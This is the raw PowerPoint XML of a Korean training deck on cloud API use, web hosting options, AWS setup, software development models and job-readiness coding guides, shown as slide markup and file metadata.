        <p:nvPicPr>
          <p:cNvPr id="505" name="Google Shape;50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604" y="3082277"/>
            <a:ext cx="6801221" cy="328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외부 API 연동의 이해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2800"/>
              <a:t>네이버 클라우드 플랫폼 API 연동 사례</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248615" y="6446937"/>
            <a:ext cx="21259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https://www.ncloud.com/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752" y="2528885"/>
            <a:ext cx="6348838" cy="370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42fae918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외 다른 방법</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;g1442fae918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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400"/>
              <a:t>웹 호스팅</a:t>
            </a:r>
            <a:endParaRPr sz="24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ko-KR" sz="2000"/>
              <a:t>까페24 호스팅 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hosting.cafe24.com/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ko-KR" sz="2000"/>
              <a:t>가비아 호스팅 : : :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://webhosting.gabia.com/</a:t>
            </a:r>
            <a:endParaRPr sz="200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ko-KR" sz="2400"/>
              <a:t>파이어 베이스 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://firebase.google.com/</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/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ko-KR" sz="2400"/>
              <a:t>Heroku : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.heroku.com/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클라우드에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과정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84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클라우드에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71907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err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>youtu.be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err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Pv2yDJ2NKQA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>aws.amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/getting-started/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00" y="2897124"/>
            <a:ext cx="6950630" cy="308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131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3c8bf3e09_0_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17" name="Google Shape;517;g143c8bf3e09_0_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/>
              <a:t>Part 03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3c8bf3e0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23" name="Google Shape;523;g143c8bf3e09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우수 레퍼런스 분석 및 핵심 역량 교육(취업 역량 교육)</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3873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이전 교육생 팀 프로젝트 결과 산출 물 참고.</a:t>
            </a:r>
            <a:endParaRPr sz="21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3c8bf3e09_0_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29" name="Google Shape;529;g143c8bf3e09_0_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실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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소프트웨어 공학</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="530" name="Google Shape;530;g143c8bf3e09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25" y="2738436"/>
            <a:ext cx="7216358" cy="349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실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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소프트웨어 공학</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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1700"/>
              <a:t>폭포수 모델</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="537" name="Google Shape;53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713" y="3081337"/>
            <a:ext cx="4090707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8915" y="3019424"/>
            <a:ext cx="297026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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302838" y="6408837"/>
            <a:ext cx="26709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https://bmind305.tistory.com/32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실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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소프트웨어 공학</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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1700"/>
              <a:t>나선형 모델</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302838" y="6408837"/>
            <a:ext cx="25362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https://itwiki.kr/w/나선형_모델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774" y="3138487"/>
            <a:ext cx="6829425" cy="240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실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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소프트웨어 공학</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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1700"/>
              <a:t>애자일 프로세스</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502863" y="6408837"/>
            <a:ext cx="2510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https://freemoa-blog.com/930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76" y="3202780"/>
            <a:ext cx="3967163" cy="2466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556" name="Google Shape;556;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5195025" y="3414711"/>
            <a:ext cx="3401287" cy="2043114"/>
            <a:chOff x="5195025" y="3183730"/>
            <a:chExt cx="3401287" cy="2043114"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="557" name="Google Shape;557;p7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95025" y="3183730"/>
              <a:ext cx="3401287" cy="204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74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5195025" y="3202780"/>
              <a:ext cx="1148625" cy="321470"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAF1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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7425824" y="3202780"/>
              <a:ext cx="1148625" cy="321470"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAF1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취업 역량 강화</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565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500"/>
              <a:t>포트폴리오 작성 실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3873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500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="2100"/>
              <a:t>소프트웨어 공학</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="566" name="Google Shape;56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2831311"/>
            <a:ext cx="6470504" cy="293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3232</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>667</Paragraphs>
  <Slides>143</Slides>
  <Notes>111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3" baseType="lpstr">
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Nanum Gothic Coding</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Time</vt:lpstr>
      <vt:lpstr>Dotum</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>클라우드 API 활용</vt:lpstr>
      <vt:lpstr>웹 애플리케이션 개발</vt:lpstr>
      <vt:lpstr>웹 애플리케이션 개발</vt:lpstr>
      <vt:lpstr>외부 API 연동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외부 API 연동의 이해</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>소셜 로그인</vt:lpstr>
      <vt:lpstr>소셜 로그인</vt:lpstr>
      <vt:lpstr>다양한 소셜 로그인 (참고)</vt:lpstr>
      <vt:lpstr>Firebase Authentication</vt:lpstr>
      <vt:lpstr>스프링 부트에서 소셜 로그인</vt:lpstr>
      <vt:lpstr>스프링 시큐리티 OAuth2</vt:lpstr>
      <vt:lpstr>Eclipse에 STS 설치</vt:lpstr>
      <vt:lpstr>스프링 부트 프로젝트 생성</vt:lpstr>
      <vt:lpstr>IDE에 Project Lombok 설치</vt:lpstr>
      <vt:lpstr>스프링 부트 프로젝트 생성</vt:lpstr>
      <vt:lpstr>Repository 디렉토리</vt:lpstr>
      <vt:lpstr>server.port 변경</vt:lpstr>
      <vt:lpstr>스프링 부트 프로젝트 실행</vt:lpstr>
      <vt:lpstr>스프링 시큐리티 OAuth 2.0</vt:lpstr>
      <vt:lpstr>스프링 OAuth2 클라이언트</vt:lpstr>
      <vt:lpstr>스프링 부트 2.0에서 OAuth</vt:lpstr>
      <vt:lpstr>구글 클라우드 플랫폼</vt:lpstr>
      <vt:lpstr>구글 클라우드 플랫폼</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>스프링 부트 CRUD 구현 실습</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>클라우드의 여러 가지 형태</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>API로 웹 서비스 시작</vt:lpstr>
      <vt:lpstr>AWS 무료 온라인 교육</vt:lpstr>
      <vt:lpstr>Amazon AWS 서비스 가입</vt:lpstr>
      <vt:lpstr>지원 플랜 선택</vt:lpstr>
      <vt:lpstr>AWS 요금 폭탄 (?)</vt:lpstr>
      <vt:lpstr>이메일 확인</vt:lpstr>
      <vt:lpstr>빠른 시작</vt:lpstr>
      <vt:lpstr>빠른 시작</vt:lpstr>
      <vt:lpstr>(참고) PC에 리눅스 설치</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 배포판의 종류</vt:lpstr>
      <vt:lpstr>리눅스 기본 명령어</vt:lpstr>
      <vt:lpstr>인스턴스 시작 검토</vt:lpstr>
      <vt:lpstr>private key file 다운로드</vt:lpstr>
      <vt:lpstr>시작 상태</vt:lpstr>
      <vt:lpstr>인스턴스 시작</vt:lpstr>
      <vt:lpstr>Puttygen 다운로드</vt:lpstr>
      <vt:lpstr>pem을 ppk로 변환</vt:lpstr>
      <vt:lpstr>ppk로 변환된 파일을 사용</vt:lpstr>
      <vt:lpstr>인스턴스에 연결 정보 확인</vt:lpstr>
      <vt:lpstr>putty 를 이용해서 연결</vt:lpstr>
      <vt:lpstr>AWS에 httpd 설치</vt:lpstr>
      <vt:lpstr>yum 패키지 업데이트</vt:lpstr>
      <vt:lpstr>httpd</vt:lpstr>
      <vt:lpstr>httpd 개념</vt:lpstr>
      <vt:lpstr>httpd 설치</vt:lpstr>
      <vt:lpstr>소스업로드 하기</vt:lpstr>
      <vt:lpstr>WinSCP를 통한 파일 전송</vt:lpstr>
      <vt:lpstr>접근 권한 문제</vt:lpstr>
      <vt:lpstr>접근 권한 문제</vt:lpstr>
      <vt:lpstr>httpd 서비스 실행</vt:lpstr>
      <vt:lpstr>웹 서버 포트 설정</vt:lpstr>
      <vt:lpstr>S3 스토리지 사용하기</vt:lpstr>
      <vt:lpstr>S3 스토리지 사용하기</vt:lpstr>
      <vt:lpstr>S3 스토리지 사용하기</vt:lpstr>
      <vt:lpstr>EB 생성</vt:lpstr>
      <vt:lpstr>Git 사용하기</vt:lpstr>
      <vt:lpstr>그 외 다른 방법</vt:lpstr>
      <vt:lpstr>클라우드에 배포</vt:lpstr>
      <vt:lpstr>클라우드에 배포</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>계획</vt:lpstr>
      <vt:lpstr>팀 프로젝트 관리 도구 선정</vt:lpstr>
      <vt:lpstr>요구 분석</vt:lpstr>
      <vt:lpstr>아키텍처 설계</vt:lpstr>
      <vt:lpstr>아키텍처 설계</vt:lpstr>
      <vt:lpstr>아키텍처 설계</vt:lpstr>
      <vt:lpstr>아키텍처 설계</vt:lpstr>
      <vt:lpstr>아키텍처 설계</vt:lpstr>
      <vt:lpstr>화면 설계</vt:lpstr>
      <vt:lpstr>화면 설계</vt:lpstr>
      <vt:lpstr>화면 설계</vt:lpstr>
      <vt:lpstr>자바 코딩 가이드</vt:lpstr>
      <vt:lpstr>0. 코딩 가이드에 앞서</vt:lpstr>
      <vt:lpstr>1. 개발 프로세스</vt:lpstr>
      <vt:lpstr>2. 자바 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>2. 자바 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>2. 자바 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>2. 자바 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>3. JavaScript 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>3. JavaScript 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>4. HTML/CSS/XML 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>4. HTML/CSS/XML 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>4. HTML/CSS/XML 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>4. HTML/CSS/XML 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>4. HTML/CSS 코딩 컨벤션</vt:lpstr>
      <vt:lpstr>5. 자바 보안 코딩 가이드</vt:lpstr>
      <vt:lpstr>5. 자바 보안 코딩 가이드</vt:lpstr>
      <vt:lpstr>5. 자바 보안 코딩 가이드</vt:lpstr>
      <vt:lpstr>6. API URL 가이드</vt:lpstr>
      <vt:lpstr>6. API URL 가이드</vt:lpstr>
      <vt:lpstr>7. 정적 분석 방법</vt:lpstr>
      <vt:lpstr>8. 테스트케이스 작성 가이드</vt:lpstr>
      <vt:lpstr>8. 테스트케이스 작성 가이드</vt:lpstr>
      <vt:lpstr>9. 프로젝트 디렉토리 구성</vt:lpstr>
      <vt:lpstr>10. 용어집</vt:lpstr>
      <vt:lpstr>11. 웹 접근성</vt:lpstr>
      <vt:lpstr>취업 역량 강화</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>끝.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API 활용</dc:title>
  <dc:creator>Microsoft Corporation</dc:creator>
  <cp:lastModifiedBy>beomjoon kim</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-10-05T04:04:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-28T13:28:19Z</dcterms:modified>
</cp:coreProperties>
</file>